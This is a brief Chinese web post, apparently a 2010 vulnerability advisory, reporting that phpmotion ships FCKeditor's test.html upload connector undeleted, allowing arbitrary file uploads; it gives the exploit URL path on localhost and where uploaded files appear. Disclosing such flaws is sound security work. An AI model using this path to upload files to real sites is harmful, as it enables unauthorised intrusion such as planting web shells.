phpmotion/FCKeditor 上传漏洞

发布日期:2010-12.28
发布作者:anonymous


官方网站:http://www.phpmotion.com/

漏洞类型:文件上传
漏洞描述:phpmotion程序使用FCKeditor编辑器,未对test.html页面进行删除导致上传文件漏洞。



I. POC & Exploit
-----------------------------------------------------------------------
Default : http://127.0.0.1/


exploit : http://127.0.0.1/phpmotion/fckeditor/editor/filemanager/connectors/test.html


results in : http://127.0.0.1/userfiles/name of file

本文由站长原创或收集,不代表本站立场,如若转载,请注明出处:http://yesck.com/post/382/

本文 暂无 评论

回复给

欢迎点评

联系我们

站长QQ:8117829

站长邮件:8117829@qq.com

工作时间:周一至周五,9:30-18:30,节假日休息

QR code